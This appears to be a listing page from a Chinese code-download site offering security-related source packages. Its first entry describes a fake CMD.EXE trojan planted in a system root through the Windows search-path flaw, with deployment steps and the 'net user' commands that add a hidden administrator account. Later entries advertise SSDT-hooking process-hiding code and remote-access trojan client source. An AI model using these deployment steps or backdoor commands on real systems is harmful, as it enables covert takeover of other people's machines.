-
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
- 2022-06-01 08:01:12下载
- 积分:1
-
网络入侵检测降维算法。它的作用是把捕获的数据进行分析,输出有用的信息。...
网络入侵检测降维算法。它的作用是把捕获的数据进行分析,输出有用的信息。-the algorithm about reducing demension in analysing the data for ids.
- 2022-11-27 02:35:03下载
- 积分:1
-
有关共享内存的类源代码
有关共享内存的类源代码-the shared memory of the source category
- 2022-02-07 07:25:47下载
- 积分:1
-
一个商业版入侵检测系统的核心代码!非常强大,绝对你吸引你!...
一个商业版入侵检测系统的核心代码!非常强大,绝对你吸引你!-A commercial version of intrusion detection system s core code! Very powerful, you definitely attract you!
- 2023-03-29 05:05:04下载
- 积分:1
-
我们的数据,文档基本上都存储在硬盘中,而硬盘的安全性将成为关注的焦点,本程序将针对硬盘的安全性进行相应处理...
我们的数据,文档基本上都存储在硬盘中,而硬盘的安全性将成为关注的焦点,本程序将针对硬盘的安全性进行相应处理-our data, document basically stored on the hard drive, and hard disk security will be the main focus of concern, the program will address the safety drive for appropriate action
- 2022-11-03 17:25:02下载
- 积分:1
-
HUST计算机学院研究生漏洞分析与利用的课件
HUST计算机学院研究生漏洞分析与利用的课件-Vulnerability analysis and exploit
- 2022-04-28 23:11:58下载
- 积分:1
-
内存分析映象程序
内存分析映象程序-memory mapping analysis procedures
- 2022-07-22 02:39:46下载
- 积分:1
-
红客揭密
红客揭密- The red guest reveals
- 2022-02-26 16:16:00下载
- 积分:1
-
驱动级的隐藏进程代码,在驱动层通过替换ssdt地址表中的函数来隐藏进程...
驱动级的隐藏进程代码,在驱动层通过替换ssdt地址表中的函数来隐藏进程-Driver-class to hide the process of code, in the driver layer SSDT address table by replacing the function to hide the process of
- 2022-06-26 03:01:05下载
- 积分:1
-
广外男生客户端源代码
广外男生客户端源代码-outside Canton boys client source code
- 2022-02-24 18:19:48下载
- 积分:1
